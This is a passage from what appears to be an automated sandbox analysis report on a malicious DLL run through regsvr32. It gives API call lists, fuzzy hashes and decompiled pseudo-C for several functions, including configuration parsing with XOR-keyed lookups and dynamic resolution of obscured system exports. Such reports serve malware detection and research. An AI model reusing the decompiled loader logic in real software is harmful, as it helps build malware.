Part of subcall function 007A1000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 007A102B

GetModuleHandleA.KERNEL32(4E52454B,05298CE5,73797325), ref: 007A78D7
GetProcAddress.KERNEL32(00000000), ref: 007A78DE
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 007A78F8
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 007A7916
CloseHandle.KERNEL32(00000000), ref: 007A7925
CloseHandle.KERNEL32(?), ref: 007A792A
GetLastError.KERNEL32 ref: 007A792E
HeapFree.KERNEL32(00000000,?), ref: 007A794A

Strings

8sz, xrefs: 007A7836

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID: 8sz
API String ID: 91923200-1643896621
Opcode ID: d8c3a1f7495e886a499b9e564049143c7b9e669d45830b19828f615f9c8fe442
Instruction ID: 382ed93b232330c336ccab13c8343d6e12cd184932513956cdc6bb61e2b941cc
Opcode Fuzzy Hash: d8c3a1f7495e886a499b9e564049143c7b9e669d45830b19828f615f9c8fe442
Instruction Fuzzy Hash: 5E31687190521AFBDB11AFA4DC48EDFBFB8FF8A350F108152E605A3121D778AA54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0198, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E01AE

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E01BA
_free.LIBCMT ref: 6D4E01C5
_free.LIBCMT ref: 6D4E01D0
_free.LIBCMT ref: 6D4E01DB
_free.LIBCMT ref: 6D4E01E6
_free.LIBCMT ref: 6D4E01F1
_free.LIBCMT ref: 6D4E01FC
_free.LIBCMT ref: 6D4E0207
_free.LIBCMT ref: 6D4E0215

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98a57a5b51ee1af6fcc902e3a3fe9210ca30bb7c7e551208d2758686fa4a2458
Instruction ID: 7333431b6b7d2a748bf7151e560242e376712b2d2748dd78ed671c25f4c7171c
Opcode Fuzzy Hash: 98a57a5b51ee1af6fcc902e3a3fe9210ca30bb7c7e551208d2758686fa4a2458
Instruction Fuzzy Hash: 9321FF7A908119BFDF11DFA5C980DEE7BB8BF08285F41816AF6159B120EB35DA45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 007A374B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E007A374B(int* __ecx) {
				char _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0x7aa2cc; // 0x63699bc3
				_t1 =  &_v8; // 0x7a2f44
				if(E007A3D6B( &_v12, _t1, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
					 *0x7aa320 = _v12;
				}
				_t25 =  *0x7aa2cc; // 0x63699bc3
				_t5 =  &_v8; // 0x7a2f44
				if(E007A3D6B( &_v12, _t5, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0x7aa2cc; // 0x63699bc3
						_t31 = E007A257B(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t8 =  &_v8; // 0x7a2f44
						_t75 = _t8;
						if(StrToIntExA(_t31, 0, _t8) != 0) {
							_t9 =  &_v8; // 0x7a2f44
							 *0x7aa298 =  *_t9;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0x7aa2cc; // 0x63699bc3
						_t32 = E007A257B(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t10 =  &_v8; // 0x7a2f44
						_t75 = _t10;
						if(StrToIntExA(_t32, 0, _t10) != 0) {
							_t11 =  &_v8; // 0x7a2f44
							 *0x7aa29c =  *_t11;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0x7aa2cc; // 0x63699bc3
						_t33 = E007A257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t12 =  &_v8; // 0x7a2f44
						_t75 = _t12;
						if(StrToIntExA(_t33, 0, _t12) != 0) {
							_t13 =  &_v8; // 0x7a2f44
							 *0x7aa2a0 =  *_t13;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0x7aa2cc; // 0x63699bc3
						_t34 = E007A257B(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t14 =  &_v8; // 0x7a2f44
						_t75 = _t14;
						if(StrToIntExA(_t34, 0, _t14) != 0) {
							_t15 =  &_v8; // 0x7a2f44
							 *0x7aa004 =  *_t15;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0x7aa2cc; // 0x63699bc3
						_t35 = E007A257B(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t16 =  &_v8; // 0x7a2f44
						_t75 = _t16;
						if(StrToIntExA(_t35, 0, _t16) != 0) {
							_t17 =  &_v8; // 0x7a2f44
							 *0x7aa02c =  *_t17;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0x7aa2cc; // 0x63699bc3
						_t36 = E007A257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E007A5A4E(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E007A461D();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0x7aa2cc; // 0x63699bc3
						_t37 = E007A257B(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E007A5A4E(0, _t37) != 0) {
						_t90 =  *0x7aa37c; // 0x5299630
						E007A6027(_t90 + 4, _t42);
					}
					_t38 =  *0x7aa2d0; // 0x4aed5a8
					_t18 = _t38 + 0x7ab2d2; // 0x529887a
					_t19 = _t38 + 0x7ab7c4; // 0x6976612e
					 *0x7aa31c = _t18;
					 *0x7aa390 = _t19;
					HeapFree( *0x7aa290, 0, _t74);
					L48:
					return 0;
				}
			}

0x007a374b
0x007a374e
0x007a375f
0x007a376e
0x007a377c
0x007a377c
0x007a3781
0x007a378c
0x007a379b
0x007a393e
0x007a3940
0x00000000
0x007a37a1
0x007a37a1
0x007a37a8
0x007a37be
0x007a37aa
0x007a37aa
0x007a37b7
0x007a37b7
0x007a37c8
0x007a37ca
0x007a37ca
0x007a37d4
0x007a37d6
0x007a37d9
0x007a37d9
0x007a37d4
0x007a37e0
0x007a37f6
0x007a37e2
0x007a37e2
0x007a37ef
0x007a37ef
0x007a37fa
0x007a37fc
0x007a37fc
0x007a3806
0x007a3808
0x007a380b
0x007a380b
0x007a3806
0x007a3812
0x007a3828
0x007a3814
0x007a3814
0x007a3821
0x007a3821
0x007a382c
0x007a382e
0x007a382e
0x007a3838
0x007a383a
0x007a383d
0x007a383d
0x007a3838
0x007a3844
0x007a385a
0x007a3846
0x007a3846
0x007a3853
0x007a3853
0x007a385e
0x007a3860
0x007a3860
0x007a386a
0x007a386c
0x007a386f
0x007a386f
0x007a386a
0x007a3876
0x007a388c
0x007a3878
0x007a3878
0x007a3885
0x007a3885
0x007a3890
0x007a3892
0x007a3892
0x007a389c
0x007a389e
0x007a38a1
0x007a38a1
0x007a389c
0x007a38a8
0x007a38be
0x007a38aa
0x007a38aa
0x007a38b7
0x007a38b7
0x007a38c2
0x007a38c4
0x007a38c7
0x007a38c8
0x007a38cf
0x007a38d1
0x007a38d2
0x007a38d2
0x007a38cf
0x007a38d9
0x007a38ef
0x007a38db
0x007a38db
0x007a38e8
0x007a38e8
0x007a38f3
0x007a3901
0x007a390b
0x007a390b
0x007a3910
0x007a3916
0x007a3923
0x007a3929
0x007a392f
0x007a3934
0x007a3941
0x007a3945
0x007a3945

APIs

StrToIntExA.SHLWAPI(00000000,00000000,D/z,?,D/z,63699BC3,?,D/z,63699BC3,E8FA7DD7,007AA00C,745EC740,?,?,007A2F44), ref: 007A37D0
StrToIntExA.SHLWAPI(00000000,00000000,D/z,?,D/z,63699BC3,?,D/z,63699BC3,E8FA7DD7,007AA00C,745EC740,?,?,007A2F44), ref: 007A3802
StrToIntExA.SHLWAPI(00000000,00000000,D/z,?,D/z,63699BC3,?,D/z,63699BC3,E8FA7DD7,007AA00C,745EC740,?,?,007A2F44), ref: 007A3834
StrToIntExA.SHLWAPI(00000000,00000000,D/z,?,D/z,63699BC3,?,D/z,63699BC3,E8FA7DD7,007AA00C,745EC740,?,?,007A2F44), ref: 007A3866
StrToIntExA.SHLWAPI(00000000,00000000,D/z,?,D/z,63699BC3,?,D/z,63699BC3,E8FA7DD7,007AA00C,745EC740,?,?,007A2F44), ref: 007A3898
HeapFree.KERNEL32(00000000,?,?,D/z,63699BC3,?,D/z,63699BC3,E8FA7DD7,007AA00C,745EC740,?,?,007A2F44), ref: 007A3934

Strings

D/z, xrefs: 007A375F, 007A378C, 007A3892, 007A389E, 007A3860, 007A386C, 007A382E, 007A383A, 007A37FC, 007A3808, 007A37CA, 007A37D6, 007A3762, 007A378F, 007A37CD, 007A37FF, 007A3831, 007A3863, 007A3895

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: D/z
API String ID: 3298025750-706632769
Opcode ID: 39c2b4839f92b6bf0298ba5317efd8fe852d26ae570f1f676227245af286d97f
Instruction ID: 95e7293ba23ebe44921926b2c4d97f7a8f88df2dd9338b4225c74f72eb5a6c12
Opcode Fuzzy Hash: 39c2b4839f92b6bf0298ba5317efd8fe852d26ae570f1f676227245af286d97f
Instruction Fuzzy Hash: 57517CB1E00105EACB11EFB9DCC9D6BB7A9ABCA7407248B65B401D3255E73DEB00CB25

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E4DBC, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D4E4D84: _free.LIBCMT ref: 6D4E4DA9

_free.LIBCMT ref: 6D4E4E0A

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E4E15
_free.LIBCMT ref: 6D4E4E20
_free.LIBCMT ref: 6D4E4E74
_free.LIBCMT ref: 6D4E4E7F
_free.LIBCMT ref: 6D4E4E8A
_free.LIBCMT ref: 6D4E4E95

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42c5e9fb9c8a107f3b8bf8ffb1c0d6ba7119298d49e70c01c512aecdb6b53527
Instruction ID: 2377be2a2ea238cda24e10525a1db54bc8df28070bb57ab9367c4e1821790458
Opcode Fuzzy Hash: 42c5e9fb9c8a107f3b8bf8ffb1c0d6ba7119298d49e70c01c512aecdb6b53527
Instruction Fuzzy Hash: 6A118431948B54B6D931EBB2CC45FEB77AC5F0C7D9F41482CA3AD66050EB24FD048A90

Uniqueness

Uniqueness Score: -1.00%

Function 007A63CD, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E007A63CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E007A2BF3(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x7aa2d0; // 0x4aed5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x7ab4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x7ab92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x7aa100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x007a63cd
0x007a63d4
0x007a63d8
0x007a63dd
0x007a63e4
0x007a63e7
0x007a63f1
0x007a63f6
0x007a6402
0x007a6409
0x007a6413
0x007a6413
0x007a640b
0x007a640b
0x007a640b
0x007a640b
0x007a6419
0x007a641c
0x007a6424
0x007a6427
0x007a642a
0x007a642d
0x007a6432
0x007a643b
0x007a6448
0x007a643d
0x007a6443
0x007a6443
0x007a644e
0x007a644e
0x007a6456

APIs

Part of subcall function 007A2BF3: SysAllocString.OLEAUT32(?), ref: 007A2C4F
Part of subcall function 007A2BF3: SysAllocString.OLEAUT32(0070006F), ref: 007A2C63
Part of subcall function 007A2BF3: SysAllocString.OLEAUT32(00000000), ref: 007A2C75
Part of subcall function 007A2BF3: SysFreeString.OLEAUT32(00000000), ref: 007A2CD9

memset.NTDLL ref: 007A63F1
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 007A642D
GetLastError.KERNEL32 ref: 007A643D
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 007A644E

Strings

@{z, xrefs: 007A6433
<, xrefs: 007A6402

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <$@{z
API String ID: 593937197-2166501164
Opcode ID: d214cb9e9d6487dc0ec41301933b01e2a5e59aa17c5af5e260f831bc9083396b
Instruction ID: d0d4455cb935e79c62391e41845178ff39a58f2276dcaef715161acdaaed2277
Opcode Fuzzy Hash: d214cb9e9d6487dc0ec41301933b01e2a5e59aa17c5af5e260f831bc9083396b
Instruction Fuzzy Hash: 9F113CB1900208EBDB10DFA9D889BDA7BF8BB89380F148126F905E7251D7789604CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E3ECF, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D4E3F17
__fassign.LIBCMT ref: 6D4E40F6
__fassign.LIBCMT ref: 6D4E4113
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D4E415B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D4E419B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D4E4247

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: a3722549f88305eaf50b6f9706584ce869abe3ba1b1fea4387abcdaf5d67026c
Instruction ID: c234f81b7afb385bdaf08188c61ce5f90c5fdf1f9abd39a9240603d34b4acaaa
Opcode Fuzzy Hash: a3722549f88305eaf50b6f9706584ce869abe3ba1b1fea4387abcdaf5d67026c
Instruction Fuzzy Hash: 74D18B71D04259AFCF15CFE8C880AEDBBB5BF49395F284169E869BB241D730AD06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 007A2BF3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 007A2C4F
SysAllocString.OLEAUT32(0070006F), ref: 007A2C63
SysAllocString.OLEAUT32(00000000), ref: 007A2C75
SysFreeString.OLEAUT32(00000000), ref: 007A2CD9
SysFreeString.OLEAUT32(00000000), ref: 007A2CE8
SysFreeString.OLEAUT32(00000000), ref: 007A2CF3

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 510dcacefa8db814fbf30a5260aba5e668658e06a11461264894056f81ab55df
Instruction ID: bcbafa14f28aa58f756adb921f80bc248e5c3c912f24df5974eb4820b43d1d23
Opcode Fuzzy Hash: 510dcacefa8db814fbf30a5260aba5e668658e06a11461264894056f81ab55df
Instruction Fuzzy Hash: 07314032D00609EBDB01DFACC94869FB7B6AF8A310F148565ED11EB121DB799D06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 007A71A3, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A71A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E007A5C4E(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x7aa2d0; // 0x4aed5a8
					_t1 = _t23 + 0x7ab11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x7aa2d0; // 0x4aed5a8
					_t2 = _t26 + 0x7ab787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E007A2A03(_t54);
					} else {
						_t30 =  *0x7aa2d0; // 0x4aed5a8
						_t5 = _t30 + 0x7ab774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x7aa2d0; // 0x4aed5a8
							_t7 = _t33 + 0x7ab797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x7aa2d0; // 0x4aed5a8
								_t9 = _t36 + 0x7ab756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x7aa2d0; // 0x4aed5a8
									_t11 = _t39 + 0x7ab7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E007A225C(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x007a71b2
0x007a71b6
0x007a7278
0x007a71bc
0x007a71bc
0x007a71c1
0x007a71d4
0x007a71d6
0x007a71db
0x007a71e3
0x007a71ea
0x007a71ee
0x007a71f1
0x007a7270
0x007a7271
0x007a71f3
0x007a71f3
0x007a71f8
0x007a7200
0x007a7204
0x007a7207
0x00000000
0x007a7209
0x007a7209
0x007a720e
0x007a7216
0x007a721a
0x007a721d
0x00000000
0x007a721f
0x007a721f
0x007a7224
0x007a722c
0x007a7230
0x007a7233
0x00000000
0x007a7235
0x007a7235
0x007a723a
0x007a7242
0x007a7246
0x007a7249
0x00000000
0x007a724b
0x007a7251
0x007a7256
0x007a725d
0x007a7264
0x007a7267
0x00000000
0x007a7269
0x007a726c
0x007a726c
0x007a7267
0x007a7249
0x007a7233
0x007a721d
0x007a7207
0x007a71f1
0x007a7286

APIs

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,007A7852,?,?,?,?,00000000,00000000), ref: 007A71C8
GetProcAddress.KERNEL32(00000000,7243775A), ref: 007A71EA
GetProcAddress.KERNEL32(00000000,614D775A), ref: 007A7200
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007A7216
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007A722C
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007A7242

Part of subcall function 007A225C: memset.NTDLL ref: 007A22DB

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: d672b7567dfefb2c40ea058dfd8faeebeb3738e75bd140e25a7b337458b876b7
Instruction ID: 7251711d96175ed19a2aa05e96b8d524985054e917e6970a498fbeb9122fa757
Opcode Fuzzy Hash: d672b7567dfefb2c40ea058dfd8faeebeb3738e75bd140e25a7b337458b876b7
Instruction Fuzzy Hash: BE21FBB1505206EFDB60DFA9CD44EA677F8FBC6380B014255B505CB262D779E905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD679, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6D4DD288,6D4DB4EA,6D4DB7F2), ref: 6D4DD687
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D4DD695
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D4DD6AE
SetLastError.KERNEL32(00000000,?,6D4DD288,6D4DB4EA,6D4DB7F2), ref: 6D4DD700

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1cfb65accd97bfd254efd22606ae9ef946a57f7f1d061dffd374167ea91001fe
Instruction ID: 27faa6a5570bec9d8a88c1e4bfd2dae2f696f17ed23cde4d4ae8b3e8c3ba3f41
Opcode Fuzzy Hash: 1cfb65accd97bfd254efd22606ae9ef946a57f7f1d061dffd374167ea91001fe
Instruction Fuzzy Hash: 6101F13220E7136EEA8416789CB0F262674EB83679736423EF638862D4EF528C01C9D0

Uniqueness

Uniqueness Score: -1.00%

Function 007A202E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E007A202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x7aa38c);
					_t97 = 0x80000002;
					L6:
					_t60 = E007A33FA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t15 =  &_a24; // 0x7a742d
					_t107 =  *_t15;
					if(E007A4B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E007A2A03(_a8);
						goto L29;
					}
					_t65 =  *0x7aa2d0; // 0x4aed5a8
					_t16 = _t65 + 0x7ab908; // 0x65696c43
					_t68 = E007A33FA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						if(E007A5C15(_t103,  *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x7aa384,  *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x14)) + 0x28))) == 0) {
							_t72 =  *0x7aa2d0; // 0x4aed5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x7aba0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x7ab927; // 0x55434b48
								_t73 = _t34;
							}
							_t37 =  &_a24; // 0x7a742d
							if(E007A762C(_t73,  *0x7aa384,  *0x7aa388, _t37,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x7aa2d0; // 0x4aed5a8
									_t44 = _t75 + 0x7ab893; // 0x74666f53
									_t78 = E007A33FA(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t45 =  &_a24; // 0x7a742d
										E007A33B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x7aa388,  *_t45);
										E007A33B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _t105,  *0x7aa380, _a16);
										E007A2A03(_t105);
									}
								} else {
									_t38 =  &_a24; // 0x7a742d
									E007A33B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x7aa388,  *_t38);
									E007A33B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x7aa380, _a16);
								}
								if( *_t107 != 0) {
									_t52 =  &_a24; // 0x7a742d
									E007A2A03( *_t52);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
